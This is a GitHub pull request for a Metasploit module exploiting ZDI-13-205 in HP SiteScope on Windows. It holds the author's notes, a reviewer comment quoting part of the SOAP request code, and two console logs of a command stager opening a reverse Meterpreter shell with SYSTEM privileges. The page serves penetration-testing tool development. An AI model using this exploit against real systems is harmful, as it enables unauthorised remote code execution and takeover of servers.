Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit for ZDI-13-205 #2327

Merged
merged 8 commits into from Sep 9, 2013
Merged

Exploit for ZDI-13-205 #2327

merged 8 commits into from Sep 9, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested successfully on HP SiteScope 11.20 with Operations Agent on Windows 2003 SP2.

Important: The vulnerable component is installed with Operations Agent (optional!) so it needs to be included! (Check the option while installing).

The vulnerable component is an script which is Windows specific and called from the Java Web Service. So as far as I can say it is windows specific. Did an HP Site Scope linux install but looks like the HP Operations isn't included with the installation packages (installation error). From the Java code, looks like it is prolly Windows specific (and yup, it isn't a vulnerability on the Java code really).

The exploit, in order to speed up (and work more reliable) is killing cscript processes on every command executed by the CMD Stager. Not a big deal, but the exploitation could kill legit cscript processes running on the target machine... so I've included it with ManualRanking. Let me know if you think another Ranking applies here.

Read source comment for some extra details :)

Test result:

msf exploit(hp_sitescope_runomagentcommand) > set RHOST 192.168.172.136
RHOST => 192.168.172.136
msf exploit(hp_sitescope_runomagentcommand) > check
[*] The target service is running, but could not be validated.
msf exploit(hp_sitescope_runomagentcommand) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Delivering payload...
[*] Command Stager progress -   1.44% done (1499/103903 bytes)
[*] Command Stager progress -   2.89% done (2998/103903 bytes)
[*] Command Stager progress -   4.33% done (4497/103903 bytes)
[*] Command Stager progress -   5.77% done (5996/103903 bytes)
[*] Command Stager progress -   7.21% done (7495/103903 bytes)
[*] Command Stager progress -   8.66% done (8994/103903 bytes)
[*] Command Stager progress -  10.10% done (10493/103903 bytes)
[*] Command Stager progress -  11.54% done (11992/103903 bytes)
[*] Command Stager progress -  12.98% done (13491/103903 bytes)
[*] Command Stager progress -  14.43% done (14990/103903 bytes)
[*] Command Stager progress -  15.87% done (16489/103903 bytes)
[*] Command Stager progress -  17.31% done (17988/103903 bytes)
[*] Command Stager progress -  18.75% done (19487/103903 bytes)
[*] Command Stager progress -  20.20% done (20986/103903 bytes)
[*] Command Stager progress -  21.64% done (22485/103903 bytes)
[*] Command Stager progress -  23.08% done (23984/103903 bytes)
[*] Command Stager progress -  24.53% done (25483/103903 bytes)
[*] Command Stager progress -  25.97% done (26982/103903 bytes)
[*] Command Stager progress -  27.41% done (28481/103903 bytes)
[*] Command Stager progress -  28.85% done (29980/103903 bytes)
[*] Command Stager progress -  30.30% done (31479/103903 bytes)
[*] Command Stager progress -  31.74% done (32978/103903 bytes)
[*] Command Stager progress -  33.18% done (34477/103903 bytes)
[*] Command Stager progress -  34.62% done (35976/103903 bytes)
[*] Command Stager progress -  36.07% done (37475/103903 bytes)
[*] Command Stager progress -  37.51% done (38974/103903 bytes)
[*] Command Stager progress -  38.95% done (40473/103903 bytes)
[*] Command Stager progress -  40.40% done (41972/103903 bytes)
[*] Command Stager progress -  41.84% done (43471/103903 bytes)
[*] Command Stager progress -  43.28% done (44970/103903 bytes)
[*] Command Stager progress -  44.72% done (46469/103903 bytes)
[*] Command Stager progress -  46.17% done (47968/103903 bytes)
[*] Command Stager progress -  47.61% done (49467/103903 bytes)
[*] Command Stager progress -  49.05% done (50966/103903 bytes)
[*] Command Stager progress -  50.49% done (52465/103903 bytes)
[*] Command Stager progress -  51.94% done (53964/103903 bytes)
[*] Command Stager progress -  53.38% done (55463/103903 bytes)
[*] Command Stager progress -  54.82% done (56962/103903 bytes)
[*] Command Stager progress -  56.26% done (58461/103903 bytes)
[*] Command Stager progress -  57.71% done (59960/103903 bytes)
[*] Command Stager progress -  59.15% done (61459/103903 bytes)
[*] Command Stager progress -  60.59% done (62958/103903 bytes)
[*] Command Stager progress -  62.04% done (64457/103903 bytes)
[*] Command Stager progress -  63.48% done (65956/103903 bytes)
[*] Command Stager progress -  64.92% done (67455/103903 bytes)
[*] Command Stager progress -  66.36% done (68954/103903 bytes)
[*] Command Stager progress -  67.81% done (70453/103903 bytes)
[*] Command Stager progress -  69.25% done (71952/103903 bytes)
[*] Command Stager progress -  70.69% done (73451/103903 bytes)
[*] Command Stager progress -  72.13% done (74950/103903 bytes)
[*] Command Stager progress -  73.58% done (76449/103903 bytes)
[*] Command Stager progress -  75.02% done (77948/103903 bytes)
[*] Command Stager progress -  76.46% done (79447/103903 bytes)
[*] Command Stager progress -  77.91% done (80946/103903 bytes)
[*] Command Stager progress -  79.35% done (82445/103903 bytes)
[*] Command Stager progress -  80.79% done (83944/103903 bytes)
[*] Command Stager progress -  82.23% done (85443/103903 bytes)
[*] Command Stager progress -  83.68% done (86942/103903 bytes)
[*] Command Stager progress -  85.12% done (88441/103903 bytes)
[*] Command Stager progress -  86.56% done (89940/103903 bytes)
[*] Command Stager progress -  88.00% done (91439/103903 bytes)
[*] Command Stager progress -  89.45% done (92938/103903 bytes)
[*] Command Stager progress -  90.89% done (94437/103903 bytes)
[*] Command Stager progress -  92.33% done (95936/103903 bytes)
[*] Command Stager progress -  93.77% done (97435/103903 bytes)
[*] Command Stager progress -  95.22% done (98934/103903 bytes)
[*] Command Stager progress -  96.55% done (100320/103903 bytes)
[*] Command Stager progress -  97.98% done (101805/103903 bytes)
[*] Command Stager progress -  99.42% done (103296/103903 bytes)
[*] Sending stage (752128 bytes) to 192.168.172.136
[*] Command Stager progress - 100.00% done (103903/103903 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:4775) at 2013-09-04 15:53:14 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

Meatballs1
Meatballs1 reviewed Sep 5, 2013
View reviewed changes
modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb

def check

data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is the same XML as in exploit except for the key, value and in1 values? Dont need to duplicate it :)

@jvazquez-r7
Copy link
Contributor Author

Avoiding duplicate code.... hands on

@jvazquez-r7
Copy link
Contributor Author

Doing a new test, after changes, to ensure I've not break nothing.... :s

@jvazquez-r7
Copy link
Contributor Author

Test result after fix my own break ...

msf exploit(hp_sitescope_runomagentcommand) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8080 - Delivering payload...
[*] Command Stager progress -   1.44% done (1499/103951 bytes)
[*] Command Stager progress -   2.88% done (2998/103951 bytes)
[*] Command Stager progress -   4.33% done (4497/103951 bytes)
[*] Command Stager progress -   5.77% done (5996/103951 bytes)
[*] Command Stager progress -   7.21% done (7495/103951 bytes)
[*] Command Stager progress -   8.65% done (8994/103951 bytes)
[*] Command Stager progress -  10.09% done (10493/103951 bytes)
[*] Command Stager progress -  11.54% done (11992/103951 bytes)
[*] Command Stager progress -  12.98% done (13491/103951 bytes)
[*] Command Stager progress -  14.42% done (14990/103951 bytes)
[*] Command Stager progress -  15.86% done (16489/103951 bytes)
[*] Command Stager progress -  17.30% done (17988/103951 bytes)
[*] Command Stager progress -  18.75% done (19487/103951 bytes)
[*] Command Stager progress -  20.19% done (20986/103951 bytes)
[*] Command Stager progress -  21.63% done (22485/103951 bytes)
[*] Command Stager progress -  23.07% done (23984/103951 bytes)
[*] Command Stager progress -  24.51% done (25483/103951 bytes)
[*] Command Stager progress -  25.96% done (26982/103951 bytes)
[*] Command Stager progress -  27.40% done (28481/103951 bytes)
[*] Command Stager progress -  28.84% done (29980/103951 bytes)
[*] Command Stager progress -  30.28% done (31479/103951 bytes)
[*] Command Stager progress -  31.72% done (32978/103951 bytes)
[*] Command Stager progress -  33.17% done (34477/103951 bytes)
[*] Command Stager progress -  34.61% done (35976/103951 bytes)
[*] Command Stager progress -  36.05% done (37475/103951 bytes)
[*] Command Stager progress -  37.49% done (38974/103951 bytes)
[*] Command Stager progress -  38.93% done (40473/103951 bytes)
[*] Command Stager progress -  40.38% done (41972/103951 bytes)
[*] Command Stager progress -  41.82% done (43471/103951 bytes)
[*] Command Stager progress -  43.26% done (44970/103951 bytes)
[*] Command Stager progress -  44.70% done (46469/103951 bytes)
[*] Command Stager progress -  46.14% done (47968/103951 bytes)
[*] Command Stager progress -  47.59% done (49467/103951 bytes)
[*] Command Stager progress -  49.03% done (50966/103951 bytes)
[*] Command Stager progress -  50.47% done (52465/103951 bytes)
[*] Command Stager progress -  51.91% done (53964/103951 bytes)
[*] Command Stager progress -  53.35% done (55463/103951 bytes)
[*] Command Stager progress -  54.80% done (56962/103951 bytes)
[*] Command Stager progress -  56.24% done (58461/103951 bytes)
[*] Command Stager progress -  57.68% done (59960/103951 bytes)
[*] Command Stager progress -  59.12% done (61459/103951 bytes)
[*] Command Stager progress -  60.57% done (62958/103951 bytes)
[*] Command Stager progress -  62.01% done (64457/103951 bytes)
[*] Command Stager progress -  63.45% done (65956/103951 bytes)
[*] Command Stager progress -  64.89% done (67455/103951 bytes)
[*] Command Stager progress -  66.33% done (68954/103951 bytes)
[*] Command Stager progress -  67.78% done (70453/103951 bytes)
[*] Command Stager progress -  69.22% done (71952/103951 bytes)
[*] Command Stager progress -  70.66% done (73451/103951 bytes)
[*] Command Stager progress -  72.10% done (74950/103951 bytes)
[*] Command Stager progress -  73.54% done (76449/103951 bytes)
[*] Command Stager progress -  74.99% done (77948/103951 bytes)
[*] Command Stager progress -  76.43% done (79447/103951 bytes)
[*] Command Stager progress -  77.87% done (80946/103951 bytes)
[*] Command Stager progress -  79.31% done (82445/103951 bytes)
[*] Command Stager progress -  80.75% done (83944/103951 bytes)
[*] Command Stager progress -  82.20% done (85443/103951 bytes)
[*] Command Stager progress -  83.64% done (86942/103951 bytes)
[*] Command Stager progress -  85.08% done (88441/103951 bytes)
[*] Command Stager progress -  86.52% done (89940/103951 bytes)
[*] Command Stager progress -  87.96% done (91439/103951 bytes)
[*] Command Stager progress -  89.41% done (92938/103951 bytes)
[*] Command Stager progress -  90.85% done (94437/103951 bytes)
[*] Command Stager progress -  92.29% done (95936/103951 bytes)
[*] Command Stager progress -  93.73% done (97435/103951 bytes)
[*] Command Stager progress -  95.17% done (98934/103951 bytes)
[*] Command Stager progress -  96.51% done (100322/103951 bytes)
[*] Command Stager progress -  97.94% done (101807/103951 bytes)
[*] Command Stager progress -  99.37% done (103298/103951 bytes)
[*] Sending stage (752128 bytes) to 192.168.172.136
[*] Command Stager progress - 100.00% done (103951/103951 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1421) at 2013-09-05 08:38:22 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

check:

msf exploit(hp_sitescope_runomagentcommand) > check
[*] The target service is running, but could not be validated.

wchen-r7 added a commit that referenced this pull request Sep 9, 2013
@wchen-r7
Land #2327 HP SiteScope Remote Code Execution
4714744
@wchen-r7 wchen-r7 merged commit 7d4bf0c into rapid7:master Sep 9, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_205 branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @Meatballs1 @wchen-r7